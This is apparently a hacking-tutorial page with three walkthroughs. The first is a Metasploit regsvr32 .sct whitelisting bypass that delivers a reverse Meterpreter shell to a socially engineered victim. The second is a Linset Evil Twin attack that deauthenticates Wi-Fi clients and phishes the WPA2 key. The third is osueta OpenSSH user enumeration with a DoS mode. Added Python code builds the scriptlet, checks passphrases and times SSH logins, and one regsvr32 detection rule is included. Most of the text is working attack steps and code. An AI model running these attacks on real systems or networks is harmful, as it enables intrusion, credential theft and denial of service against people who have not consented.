Hack Remote Windows PC using Regsvr32.exe (.sct) Application Whitelisting Bypass Server



This module simplifies the Regsvr32.exe application whitelisting bypass technique. It starts a web server that hosts an .sct file (a COM scriptlet). When the user runs the regsvr32 command the module prints, regsvr32 (through scrobj.dll) requests the .sct file and executes the PowerShell command embedded in it. That command downloads and executes the specified payload, much like the web_delivery module with the PSH target. Both web requests (the .sct file and the PowerShell download-and-execute stager) are served on the same port. The point of the technique is that regsvr32.exe is a signed Microsoft binary that AppLocker-style policies normally allow, so the script runs under a trusted process and the payload never has to be a whitelisted executable on disk.

Exploit Targets
Windows 7/8/8.1/10

Requirements
Attacker: Kali Linux
Victim PC: Windows 10

Open a Kali terminal and type msfconsole




Now type use exploit/windows/misc/regsvr32_applocker_bypass_server and set the options:
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.124 (attacker IP the payload connects back to)
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.124 (address the .sct web server listens on)
msf exploit(regsvr32_applocker_bypass_server) > set srvport 8080
msf exploit(regsvr32_applocker_bypass_server) > exploit
 


The module prints a regsvr32 one-liner of the form regsvr32 /s /n /u /i:http://192.168.0.124:8080/<file>.sct scrobj.dll. Get the victim to run it (for example in the Run dialog) through social engineering.
As soon as regsvr32 fetches the .sct, the PowerShell stager executes and the payload connects back to us, giving access to the victim's PC.


Type sessions to list the sessions opened when the victim ran the command, then sessions -i <id> to interact with one.

Once inside the session, type sysinfo to get system information, then shell to drop into the victim's command prompt.
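To make the technique above concrete, here is an added example (not code from the Metasploit module) in Python: it builds a scriptlet of the shape the module hosts, prints the regsvr32 command line the victim is asked to run, and runs a detection check over constructed process-creation command lines of the kind found in Sysmon event 1 or Windows 4688 logs. The host, port, file names and stager command are made-up placeholders.

```python
"""Added example, not code from the Metasploit module: what the hosted .sct
scriptlet looks like, the regsvr32 command line it expects the victim to run,
and a detection check over constructed process-creation command lines.
Host, port, file name and the PowerShell stager below are made-up placeholders."""
import json
import re
import uuid

# Minimal COM scriptlet: regsvr32 /i:<url> makes scrobj.dll fetch it and run the
# <script> inside <registration> as part of "registering" the object.
SCT_TEMPLATE = """<?XML version="1.0"?>
<scriptlet>
<registration progid="{progid}" classid="{{{classid}}}">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run({command}, 0, false);
]]>
</script>
</registration>
</scriptlet>
"""


def build_sct(command: str, progid: str = "Example") -> str:
    """Return the scriptlet text that runs `command` through WScript.Shell."""
    if "]]>" in command:
        raise ValueError("command would terminate the CDATA section")
    # json.dumps gives a double-quoted, escaped literal that JScript accepts
    return SCT_TEMPLATE.format(progid=progid, classid=str(uuid.uuid4()).upper(),
                               command=json.dumps(command))


def regsvr32_command(url: str) -> str:
    """The one-liner the module prints: /s silent, /n skip DllRegisterServer,
    /u unregister so nothing stays registered, /i: hands the URL to scrobj.dll."""
    return f"regsvr32 /s /n /u /i:{url} scrobj.dll"


_REGSVR32 = re.compile(r"(^|[\\\s\"'])regsvr32(\.exe)?([\"']|\s|$)", re.I)
_INSTALL_ARG = re.compile(r"[/-]i:\s*[\"']?(?P<target>[^\s\"']+)", re.I)


def is_sct_bypass(cmdline: str) -> bool:
    """Flag regsvr32 invocations whose /i: argument is a URL or .sct file, or that
    load scrobj.dll; a normal DLL registration matches neither condition."""
    if not _REGSVR32.search(cmdline):
        return False
    if re.search(r"\bscrobj\.dll\b", cmdline, re.I):
        return True
    m = _INSTALL_ARG.search(cmdline)
    if m:
        target = m.group("target").lower()
        return target.startswith(("http://", "https://", "ftp://")) or target.endswith(".sct")
    return False


# Constructed sample command lines (shape of Sysmon event 1 / 4688 CommandLine fields)
SAMPLE_CMDLINES = [
    regsvr32_command("http://192.168.0.124:8080/Abc123.sct"),
    r'C:\Windows\System32\regsvr32.exe /u /n /s /i:https://files.example.test/x.sct scrobj.dll',
    r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    r'cmd.exe /c regsvr32 /s /i:C:\Temp\payload.sct scrobj.dll',
    r'rundll32.exe shell32.dll,Control_RunDLL',
]


def flagged(cmdlines=SAMPLE_CMDLINES):
    """Return the command lines the detection rule considers suspicious."""
    return [c for c in cmdlines if is_sct_bypass(c)]


if __name__ == "__main__":
    print(build_sct('powershell -nop -w hidden -c "Write-Host stager placeholder"'))
    print(regsvr32_command("http://192.168.0.124:8080/Abc123.sct"))
    for line in flagged():
        print("SUSPICIOUS:", line)
```

The detection keys on the two things the technique cannot avoid: an /i: argument that is a URL or scriptlet rather than a local install string, and scrobj.dll as the DLL being "registered". The ordinary vendor DLL registration in the sample list is left alone.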


Hack Wifi using Evil Twin Method with Linset in Kali Linux

Linset is a tool for the Evil Twin attack against WPA/WPA2 networks.
How it works
Scan the networks.
Select a network.
Capture the handshake (the tool can be used without one, but the handshake is what lets it verify the password the victim types).
Choose one of several web interfaces (contributed by users).
Start a fake AP imitating the original.
Start a DHCP server on the fake AP.
Start a DNS server that redirects all requests to the host.
Launch the web server with the selected interface.
Launch the mechanism that checks the validity of the passwords entered, against the captured handshake.
Deauthenticate all clients of the real network, so that they connect to the fake AP and enter the password.
The attack stops once a submitted password passes the check.

First of all, download Linset from GitHub, then make the script executable with:
chmod +x linset
and run it with:
./linset

After launch it asks which interface to use; select wlan0 (the wireless interface), which Linset puts into monitor mode.


Then it asks for the channel; enter 1 to scan all channels.


In monitor mode it now lists every Wi-Fi network in range; wait until your target appears, then press Ctrl+C.

It then lists all the APs with their SSID, ID number and signal strength; enter the ID of your target and hit Enter. In my case I selected rajlab by entering 1.


Now select hostapd by entering 1; it is the program used to create the fake AP.


Hit Enter to use the default path for the capture file, or give a custom path. Next it asks which method to use to check the handshake; select 1 for aircrack-ng.


Select 1 to deauthenticate all clients connected to the target AP, so that they reconnect and the handshake can be captured.


Once the handshake is captured it is shown in the top right corner of the new window; then enter 1 in the menu window to confirm that the handshake was captured.


Select 1 for the web interface that will be presented to the victim when they connect to our fake AP.


It then asks for the language of the web interface; enter 1 for English.


Four terminal windows open, among them one that runs the fake AP, one that keeps deauthenticating all clients of the real AP, and one that shows information about the AP and its clients.


As you can see there are now two rajlab APs: one is fake and open, the other is the original. Clients cannot stay connected to the original because of our deauth attack, so they are pushed towards our fake AP.


After connecting to the fake AP, the victim's browser is redirected to the page shown below, which asks for the password of the original AP. Each submitted password is checked against the captured handshake; wrong ones are rejected and the page is shown again, and the attack only stops when the victim enters the correct one.


After the correct password is submitted the attack stops and the page tells the victim that the connection will be restored.


As you can see, in my case the victim entered the correct password and we obtained the key:
KEY FOUND! [ raj123987 ]
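The step that makes the attack end only on the right password is the handshake check. The following added example (not Linset's own code, which delegates this to aircrack-ng) shows that check in Python: it derives the PMK and PTK from a candidate passphrase and compares the resulting MIC with the one in message 2 of a captured WPA2 4-way handshake. The "capture" is constructed inline from made-up MACs, nonces and a minimal EAPOL-Key frame, not a real pcap; the SSID and key are taken from the walkthrough above.

```python
"""Added example, not Linset's own code: verify a candidate WPA2-PSK passphrase
against a 4-way handshake, the check Linset runs on the password typed into the
captive portal. The handshake below is constructed in make_sample_handshake
(MACs, nonces and frame are made up), not a real capture."""
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes, length: int = 48) -> bytes:
    # IEEE 802.11i PRF over "Pairwise key expansion" || 0x00 || sorted MACs || sorted nonces
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
        i += 1
    return out[:length]


def compute_mic(kck: bytes, eapol: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(hs: dict, passphrase: str) -> bool:
    """True if the passphrase reproduces the MIC of the handshake's message 2."""
    if not 8 <= len(passphrase) <= 63:
        return False  # WPA-PSK passphrases are 8..63 characters; skip the PBKDF2 work
    pmk = derive_pmk(passphrase, hs["ssid"])
    kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(compute_mic(kck, hs["eapol"]), hs["mic"])


def make_sample_handshake(passphrase: str, ssid: str = "rajlab") -> dict:
    """Constructed stand-in for a real capture: build message 2 of the 4-way
    handshake as a client holding `passphrase` would, so the MIC is genuine."""
    ap_mac = bytes.fromhex("001122334455")   # made-up BSSID
    sta_mac = bytes.fromhex("66778899aabb")  # made-up client MAC
    anonce = bytes(range(32))                # made-up AP nonce
    snonce = bytes(range(32, 64))            # made-up client nonce
    body = (b"\x02"                 # descriptor type: RSN
            + b"\x01\x0a"           # key info: version 2 (HMAC-SHA1), pairwise, MIC bit
            + b"\x00\x00"           # key length
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + b"\x00" * 16          # MIC placeholder
            + b"\x00\x00")          # key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, EAPOL-Key
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = compute_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}


if __name__ == "__main__":
    hs = make_sample_handshake("raj123987")
    for guess in ("password", "raj123987"):
        print(guess, "->", "KEY FOUND!" if check_passphrase(hs, guess) else "rejected")
```

Only the KCK (the first 16 bytes of the PTK) is needed for the check, and the 4096-round PBKDF2 is what makes each guess cost something; that is why a captive portal that gets the victim to type the passphrase is so much cheaper than brute force against the same handshake.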

OpenSSH User Enumeration Time-Based Attack with Osueta

OpenSSH (OpenBSD Secure Shell) is a suite of network utilities based on the Secure Shell (SSH) protocol. It secures network communications by encrypting traffic, supports multiple authentication methods and provides secure tunnelling.

OpenSSH encrypts all traffic to defeat eavesdropping and man-in-the-middle attacks, but a user enumeration timing attack was discovered that makes brute force far more efficient. A brute force attack has to guess two fields, username and password; with this attack the usernames are confirmed first, so only the password field remains to be brute forced, which cuts the time required considerably.

Osueta is a simple Python script that exploits the OpenSSH user enumeration timing attack (found in OpenSSH 5.* and 6.* on *nix systems).
How it works

When we connect to an SSH server we provide a username and a password. The server first checks whether the username exists:
1.) If the username does not exist, the password is not compared to the real one.
2.) If the username exists, the password is hashed and compared to the stored hash; if it matches, access is granted.
3.) Now suppose the username exists and we send a very long password, say 40000 bytes, which is osueta's default (40000 'S' characters). The server has to hash all of it before it can compare, so the response takes measurably longer. That delay is the signal: a slow rejection tells us the username exists. Network jitter can also produce delays, so the baseline for nonexistent users has to be measured first, which is why osueta tries random usernames before the real ones.
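The measurement and decision logic described above, as an added example in Python (not osueta's own code). probe_login_time() times one real password login with paramiko (imported lazily, so the rest of the module runs offline); enumerate_users() takes any probe callable, measures the baseline with random usernames and reports candidates that are rejected much more slowly. The demo at the bottom uses a fake probe with made-up timings instead of a live server; the host and port in live_probe() are placeholders.

```python
"""Added example, not osueta's own code: the measurement and decision logic of a
timing-based SSH user enumeration. probe_login_time() does one real timed login
with paramiko; enumerate_users() works on any probe callable, and the demo uses a
constructed fake probe with made-up timings instead of a live server."""
import functools
import secrets
import statistics
import string
import time

LONG_PASSWORD = "S" * 40000  # as in osueta's default: make the hashing step expensive


def probe_login_time(host, port, username, password=LONG_PASSWORD, timeout=30):
    """Seconds until the server rejects a password login for `username`."""
    import paramiko  # only needed for real probes
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    start = time.monotonic()
    try:
        client.connect(host, port=port, username=username, password=password,
                       look_for_keys=False, allow_agent=False, timeout=timeout,
                       banner_timeout=timeout, auth_timeout=timeout)
    except paramiko.AuthenticationException:
        pass  # the expected outcome; only the elapsed time matters
    finally:
        client.close()
    return time.monotonic() - start


def live_probe(host, port):
    """Bind a real target for enumerate_users(); host and port are placeholders."""
    return functools.partial(probe_login_time, host, port)


def random_usernames(n, length=12):
    """Names that almost certainly do not exist, used to measure the baseline."""
    alphabet = string.ascii_lowercase + string.digits
    return ["".join(secrets.choice(alphabet) for _ in range(length)) for _ in range(n)]


def enumerate_users(candidates, probe, baseline_count=10, factor=3.0):
    """Return the candidates whose rejection takes `factor` times longer than the
    median for random (nonexistent) users. On a noisy link, repeat the run and
    raise `factor`: baseline jitter is the main source of false positives."""
    baseline = [probe(user) for user in random_usernames(baseline_count)]
    threshold = statistics.median(baseline) * factor
    return [user for user in candidates if probe(user) > threshold]


# --- constructed demo: a fake server on which only these accounts exist ---------
_FAKE_EXISTING = {"pp", "root", "him"}


def fake_probe(username):
    """Made-up timings: hashing 40000 bytes for an existing user (~0.9 s),
    an immediate rejection otherwise (~0.05 s)."""
    return 0.9 if username in _FAKE_EXISTING else 0.05


def demo(candidates=("pp", "root", "him", "alice", "bob")):
    """Run the enumeration against the fake server."""
    return enumerate_users(list(candidates), fake_probe)


if __name__ == "__main__":
    print("fake server:", demo())
    # Against a real target (placeholders): enumerate_users(["pp", "root"], live_probe("192.168.222.136", 22))
```

The probe deliberately sends the same long password every time, so the only variable between baseline and candidate is whether the server bothers to hash it; that is the whole side channel.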

First clone the github repo with the terminal command:

git clone https://github.com/c0r3dump3d/osueta.git


Now change into the osueta directory and run:
python osueta.py -H 192.168.222.136 -U pp -p 22
-H  OpenSSH server host (the victim IP, 192.168.222.136 in my case)
-U  a guessed username that may exist on the victim machine (pp in my case)
-p  port of the running SSH service (22 in our case)
It first checks whether the given port is open, then grabs the service banner to learn the version of the running SSH server.


Now it generates 10 random usernames and tries them against the target to measure the server's baseline response, i.e. the delay for nonexistent users. It then tests the supplied username; if the rejection is noticeably slower than the baseline, the user exists. In my case the user pp exists on the target server.


We can also pass a list of users to check every username in the list:
./osueta.py -H 192.168.222.136 -L users.txt -p 22
-L  input file of usernames (users.txt in my case)


In my case it successfully enumerated the following usernames from the list:
pp
root
him


We can also create a DoS (denial of service) condition on the target server with:
./osueta.py -H 192.168.222.136 -p 22 -U pp -v no --dos yes
--dos yes  keep opening connections until the server refuses new ones (-v no turns verbose output off)


It first checks that the given user exists. If so, it opens a large number of connections, each of which keeps sshd busy hashing the long password; once the server's limit on concurrent unauthenticated connections is reached (MaxStartups in sshd_config), it rejects further connections, which is the DoS.


As you can see, the target server denies the connection when I try to connect to it.